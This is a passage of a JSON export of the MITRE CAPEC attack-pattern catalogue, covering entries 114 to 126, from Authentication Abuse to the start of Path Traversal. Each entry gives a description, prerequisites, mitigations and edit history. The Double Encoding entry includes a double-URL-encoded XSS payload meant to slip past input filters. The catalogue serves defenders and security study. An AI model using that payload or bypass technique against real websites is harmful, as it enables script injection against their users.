Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, @Status, Description, Example_Instances, Prerequisites, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses, Resources_Required"}],"Previous_Entry_Name":["API Abuse/Misuse",{"Date":"2015-12-07"},"API Manipulation",{"Date":"2020-12-17"}]}},"114":{"ID":"114","Name":"Authentication Abuse","Abstraction":"Meta","Status":"Draft","Description":"An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme\'s implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target\'s authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \\"Exploitation of Session Variables, Resource IDs and other Trusted Credentials\\" attack patterns.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way."},"Resources_Required":{"Resource":"A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"287"},{"CWE_ID":"1244"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1548","Entry_Name":"Abuse Elevation Control Mechanism"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"115":{"ID":"115","Name":"Authentication Bypass","Abstraction":"Meta","Status":"Draft","Description":"An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place. This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc."},"Resources_Required":{"Resource":"A client application, such as a web browser, or a scripting language capable of interacting with the target."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"287"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1548","Entry_Name":"Abuse Elevation Control Mechanism"}},"References":{"Reference":{"External_Reference_ID":"REF-598","Section":"Testing for Bypassing Authentication Schema"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"116":{"ID":"116","Name":"Excavation","Abstraction":"Meta","Status":"Stable","Description":"An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes. This is achieved by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target, or by sending data that is syntactically invalid or non-standard in an attempt to produce a response that contains the desired data. As a result of these interactions, the adversary is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. Examplar exchanges with the target may trigger unhandled exceptions or verbose error messages that reveal information like stack traces, configuration information, path information, or database design. This type of attack also includes the manipulation of query strings in a URI to produce invalid SQL queries, or by trying alternative path values in the hope that the server will return useful information.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"CanPrecede","CAPEC_ID":"163"}},"Prerequisites":{"Prerequisite":"An adversary requires some way of interacting with the system."},"Resources_Required":{"Resource":"A tool, such as an Adversary in the Middle (CAPEC-94) Proxy or a fuzzer, that is capable of generating and injecting custom inputs to be used in the attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Minimize error/response output to only what is necessary for functional use or corrective language.","Remove potentially sensitive information that is not necessary for the application\'s functionality."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"200"},{"CWE_ID":"1243"}]},"Notes":{"Note":["Large quantities of data is often moved from the target system to some other adversary controlled system. Data found on a target system might require extensive resources to be fully analyzed. Using these resources on the target system might enable a defender to detect the adversary. Additionally, proper analysis tools required might not be available on the target system.",{"Type":"Other"},"This attack differs from Data Interception and other data collection attacks in that the attacker actively queries the target rather than simply watching for the target to reveal information.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Other_Notes, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Resources_Required"}]}},"117":{"ID":"117","Name":"Interception","Abstraction":"Meta","Status":"Stable","Description":"An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position themself so as to observe explicit data channels (e.g. network traffic) and read the content. However, this attack differs from a Adversary-In-the-Middle (CAPEC-94) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must transmit data over a medium that is accessible to the adversary."},"Resources_Required":{"Resource":"The adversary must have the necessary technology to intercept information passing between the nodes of a network. For TCP/IP, the capability to run tcpdump, ethereal, etc. can be useful. Depending upon the data being targeted the technological requirements will change."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"319"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}]}},"120":{"ID":"120","Name":"Double Encoding","Abstraction":"Detailed","Status":"Draft","Description":"The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery.","Manually inspect the application to find entry points."]},{"Step":"2","Phase":"Experiment","Description":"[Probe entry points to locate vulnerabilities] Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.","Technique":"Try to use double-encoding to bypass validation routines."}]},"Prerequisites":{"Prerequisite":["The target\'s filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.","The application accepts and decodes URL string request.","The application performs insufficient filtering/canonicalization on the URLs."]},"Resources_Required":{"Resource":"Tools that automate encoding of data can assist the adversary in generating encoded strings."},"Mitigations":{"Mitigation":["Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.","Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.","When client input is required from web-based forms, avoid using the \\"GET\\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \\"POST method whenever possible.","Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.","Refer to the RFCs to safely decode URL.","Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.","There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)."]},"Example_Instances":{"Example":{"p":["Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:","Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code."],"div":["%253Cscript%253Ealert(\'This is an XSS Attack\')%253C%252Fscript%253E",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"177"},{"CWE_ID":"181"},{"CWE_ID":"183"},{"CWE_ID":"184"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"692"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"121":{"ID":"121","Name":"Exploit Non-Production Interfaces","Abstraction":"Standard","Status":"Stable","Description":{"p":["An adversary exploits a sample, demonstration, test, or debug interface that is unintentionally enabled on a production system, with the goal of gleaning information or leveraging functionality that would otherwise be unavailable. Non-production interfaces are insecure by default and should not be resident on production systems, since they may reveal sensitive information or functionality that should not be known to end-users. However, such interfaces may be unintentionally left enabled on a production system due to configuration errors, supply chain mismanagement, or other pre-deployment activities.","Ultimately, failure to properly disable non-production interfaces, in a production environment, may expose a great deal of diagnostic information or functionality to an adversary, which can be utilized to further refine their attack. Moreover, many non-production interfaces do not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may contain many flaws and vulnerabilities that could allow an adversary to severely disrupt a target."]},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"113"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine Vulnerable Interface] An adversary explores a target system for sample or test interfaces that have not been disabled by a system administrator and which may be exploitable by the adversary.","Technique":"If needed, the adversary explores an organization\'s network to determine if any specific systems of interest exist."},{"Step":"2","Phase":"Exploit","Description":"[Leverage Test Interface to Execute Attacks] Once an adversary has discovered a system with a non-production interface, the interface is leveraged to exploit the system and/or conduct various attacks.","Technique":"The adversary can leverage the sample or test interface to conduct several types of attacks such as Adversary-in-the-Middle attacks (CAPEC-94), keylogging, Cross Site Scripting (XSS), hardware manipulation attacks, and more."}]},"Prerequisites":{"Prerequisite":"The target must have configured non-production interfaces and failed to secure or remove them when brought into a production environment."},"Skills_Required":{"Skill":["Exploiting non-production interfaces requires significant skill and knowledge about the potential non-production interfaces left enabled in production.",{"Level":"High"}]},"Resources_Required":{"Resource":"For some interfaces, the attacker will need that appropriate client application or hardware that interfaces with the interface. Other non-production interfaces can be executed using simple tools, such as web browsers or console windows. In some cases, an attacker may need to be able to authenticate to the target before it can access the vulnerable interface."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":["Gain Privileges","Bypass Protection Mechanism"]},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Read Data","Execute Unauthorized Commands"]},{"Scope":["Access Control","Integrity"],"Impact":["Modify Data","Alter Execution Logic"]}]},"Mitigations":{"Mitigation":"Ensure that production systems to not contain non-production interfaces and that these interfaces are only used in development environments."},"Example_Instances":{"Example":[{"p":"Some software applications include application programming interfaces (APIs) that are intended to allow an administrator to test and refine their domain. These APIs are typically disabled once a system enters a production environment, but may be left in an insecure state due to a configuration error or mismanagement."},{"p":"Many hardware systems leverage bits typically reserved for future functionality for testing and debugging purposes. If these reserved bits remain enabled in a production environment, it could allow an adversary to induce unwanted/unsupported behavior in the hardware."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"489"},{"CWE_ID":"1209"},{"CWE_ID":"1259"},{"CWE_ID":"1267"},{"CWE_ID":"1270"},{"CWE_ID":"1294"},{"CWE_ID":"1295"},{"CWE_ID":"1296"},{"CWE_ID":"1302"},{"CWE_ID":"1313"}]},"References":{"Reference":[{"External_Reference_ID":"REF-588"},{"External_Reference_ID":"REF-589"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Description, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, @Status, Consequences, Description, Execution_Flow, Mitigations, Prerequisites, References, Related_Weaknesses, Resources_Required, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Locate and Exploit Test APIs",{"Date":"2015-12-07"},"Exploit Test APIs",{"Date":"2020-07-30"}]}},"122":{"ID":"122","Name":"Privilege Abuse","Abstraction":"Meta","Status":"Draft","Description":"An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"CanPrecede","CAPEC_ID":"664"}},"Prerequisites":{"Prerequisite":["The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.","The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources."]},"Skills_Required":{"Skill":["Attacker can leverage privileged features they already have access to without additional effort or skill. Attacker is only required to have access to an account with improper priveleges.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. The ability to access the target is required."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Authorization","Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":"Configure account privileges such privileged/administrator functionality is not exposed to non-privileged/lower accounts."},"Example_Instances":{"Example":{"p":"Improperly configured account privileges allowed unauthorized users on a hospital\'s network to access the medical records for over 3,000 patients. Thus compromising data integrity and confidentiality in addition to HIPAA violations."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"269"},{"CWE_ID":"732"},{"CWE_ID":"1317"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Example_Instances, Likelihood_Of_Attack, Mitigations, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"123":{"ID":"123","Name":"Buffer Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An adversary manipulates an application\'s interaction with a buffer in an attempt to read or modify data they shouldn\'t have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Prerequisites":{"Prerequisite":"The adversary must identify a programmatic means for interacting with a buffer, such as vulnerable C code, and be able to provide input to this interaction."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution","Note":"A buffer manipulation attack often results in a crash of the application due to the corruption of memory."},{"Scope":"Confidentiality","Impact":["Execute Unauthorized Commands","Modify Data","Read Data"],"Note":"If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses."}]},"Mitigations":{"Mitigation":"To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. Finally, there may be operating system level preventative functionality that can be applied."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"119"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"124":{"ID":"124","Name":"Shared Resource Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An adversary exploits a resource shared between multiple applications, an application pool or hardware pin multiplexing to affect behavior. Resources may be shared between multiple applications or between multiple threads of a single application. Resource sharing is usually accomplished through mutual access to a single memory location or multiplexed hardware pins. If an adversary can manipulate this shared resource (usually by co-opting one of the applications or threads) the other applications or threads using the shared resource will often continue to trust the validity of the compromised shared resource and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared resource, or even cause a crash or compromise of the sharing applications.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":["The target applications, threads or functions must share resources between themselves.","The adversary must be able to manipulate some piece of the shared resource either directly or indirectly and the other users of the data must accept the changed data as valid. Usually this requires that the adversary be able to compromise one of the sharing applications or threads in order to manipulate the shared data."]},"Resources_Required":{"Resource":"None: The attacker does not need any specialized resources to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1189"},{"CWE_ID":"1331"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Prerequisites, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Attack through Shared Data",{"Date":"2017-01-09"},"Shared Data Manipulation",{"Date":"2020-07-30"}]}},"125":{"ID":"125","Name":"Flooding","Abstraction":"Meta","Status":"Stable","Description":"An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target\'s operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"Any target that services requests is vulnerable to this attack on some level of scale."},"Resources_Required":{"Resource":"A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"A successful flooding attack compromises the availability of the target system\'s service by exhausting its available resources."}},"Mitigations":{"Mitigation":["Ensure that protocols have specific limits of scale configured.","Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits.","Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"404"},{"CWE_ID":"770"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"},{"Taxonomy_Name":"WASC","Entry_ID":"10","Entry_Name":"Denial of Service"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Traffic flood"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"126":{"ID":"126","Name":"Path Traversal","Abstraction":"Standard","Status":"Draft","Description":"An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\\\) and/or dots (.)) to reach desired 